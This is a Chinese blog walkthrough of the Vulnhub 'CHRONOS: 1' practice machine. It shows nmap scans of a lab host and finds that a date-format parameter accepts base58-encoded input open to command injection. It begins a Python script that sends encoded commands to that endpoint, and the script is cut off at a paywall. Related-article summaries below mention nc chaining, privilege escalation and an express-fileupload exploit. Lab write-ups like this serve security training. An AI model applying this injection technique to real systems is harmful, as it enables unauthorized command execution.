Vulnhub系列--CHRONOS: 1

最新推荐文章于 2024-12-10 15:34:34 发布
最新推荐文章于 2024-12-10 15:34:34 发布
阅读量4.5k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Vulnhub 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/blateor/article/details/123886160

wallhaven-q28gj7

本次渗透测试我将使用cs来辅助进行渗透:

打点

主机存活发现:

┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.56.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00039s latency).
Nmap scan report for 192.168.56.102
Host is up (0.013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.86 seconds

目标主机IP:192.168.56.102

对目标进行扫描:

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:42 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0031s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:f2:83:a4:38:89:8d:86:a5:e1:31:76:eb:9d:5f:ea (RSA)
|   256 41:5a:21:c4:58:f2:2b:e4:8a:2f:31:73:ce:fd:37:ad (ECDSA)
|_  256 9b:34:28:c2:b9:33:4b:37:d5:01:30:6f:87:c4:6b:23 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

访问目标:

image

发现存在一个域名:chronos.local

将其添加到hosts文件解析,可以访问这个目标:

image

发现是一个输入字符串进行解析,字符串是**base58 **编码的,解析后得到:

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

image

猜测可能存在代码执行,编写脚本:

import base58
import requests


def attack(command):
    url = b'http://chronos.local:8000/date?format=%s' % base58.b58enc
最低0.47元/天 解锁文章

200万优质内容无限畅学
VulnhubChronos1 靶机实验
weixin_64112307的博客
06-30 1160
EJS-RCE
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 632
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
VulnHub靶场】——CHRONOS: 1
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3231
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
vulnhub chronos
weixin_46107179的博客
04-06 4465
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
vulnhub靶场-Chronos
qq_42947816的博客
05-10 1025
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Chronos-VM-2:Chronos 虚拟机的新版本
07-03
1. **性能优化**:Chronos-VM-2 可能增强了JIT编译器,提高了代码执行速度,降低了内存占用,或者提升了多线程处理能力。 2. **类型系统增强**:可能会引入新的类型特性,如更强大的泛型支持,或者更好的类型检查...
nim-chronosChronos-一个高效的异步编程库
02-03
1. **Future和Promise**:`nim-chronos`的核心在于`Future`和`Promise`的概念,它们是异步操作的结果容器。`Promise`负责发起异步操作并将其结果存储在`Future`中。当异步操作完成时,`Future`可以通过回调或者`...
eth-alarm-clock-dapp:Chronos-以太坊闹钟DApp
02-05
更新:此DApp可在主网上以及Kovan和Ropsten测试网上运行。 以太坊闹钟DApp 主页: 寻找最新的安装? 想运行一个TimeNode吗? 智能合约: 开发指南 如何在本地构建和运行 如果系统上没有NPM,请安装 ...
AlekSIS-App-Chronos:数字时间表在教育管理中的应用
从文件名称“AlekSIS-App-Chronos-master”可以推断出,该资源是一个主版本的代码库,可能包含了所有相关的源代码文件、文档、测试用例和配置信息。文件名称中使用了“master”这一术语,通常表示这是项目的主干版本...
Vulnhub靶机--Chronos
Tauil的博客
08-05 736
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
VulnHub-Chronos: 1
weixin_44249502的博客
08-25 490
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
Vulnhub:CHRONOS: 1
weixin_69670995的博客
06-15 647
在 /opt/chronos-v2/backend 下发现 express-fileupload,百度一下它的漏洞,找的了攻击代码。抓包发现有三个请求,最后一个显示了时间,将get传参进行解密,尝试了base64,结果失败,后来发现是base58解密。将下载的虚拟机导入Oracle VM VirtualBox中,网络设置仅主机模式,网卡使用和kali相同的网卡。发现是显示当前时间的命令,猜测是命令执行,尝试一下命令要用base58编码一下。发现22,80,8080端口,使用浏览器访问80端口。
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 979
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
无线感知会议系列17】Chronos-1
最新发布
4AM_明朝百晓生
12-10 965
本文的主体部分解释了Chronos如何克服这些挑战,计算绝对飞行时间,并使用单个接入点实现定位.Chronos在计算飞行时间时,在视线范围内(line-of-sight)的中位误差为0.47纳秒,在非视线范围内(non-line-of-sight)的中位误差为0.69纳秒。然而,不同的数据包会经历不同的随机检测延迟。据我们所知,Chronos是首个使配备商用WiFi网卡的节点能够在没有任何第三方支持(无论是其他WiFi节点还是外部传感器,如加速度计)的情况下,以数十厘米的精度定位另一个节点的系统。
vulhub靶场之chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 536
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
Vulnhub靶机实战-CYNIX 1
黑白的博客
01-18 631
声明 好好学习,天天向上 搭建 官方建议virtual打开,我这里都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A 开启端口 发现开启80,6688 访问80 http://192.168.31.121 目录扫描 gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-lis
米斯特白帽培训讲义 工具篇 Nmap
热门推荐
龙哥盟
12-22 4万+
米斯特白帽培训讲义 工具篇 Nmap 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 介绍Nmap(网络映射器)是由 Gordon Lyon 涉及,用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓补图,Nmap 发送特制的数据包到目标主机,然后对返回数据包进行分析。Nmap 是一款枚举和测试网络的强大工具。Nmap 有两种界面:可视化
LAMP平台安全加固:配置LAMP平台的基础加固
彭淦淦的博客
05-14 695
3.1 问题 本例要求针对CentOS 7系统,配置LAMP平台的基础加固,主要完成下列任务。 增强mariadb数据库的安全 增强httpd网站的安全 增强php网页编程环境的安全 其他安全措施,可以自行发挥 3.2 步骤 实现此案例需要按照如下步骤进行。 步骤一:增强mariadb数据库的安全 1)执行mysql_secure_installation安全安装 [root@svr7 ~]# mysql_secure_installation //启动安全安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值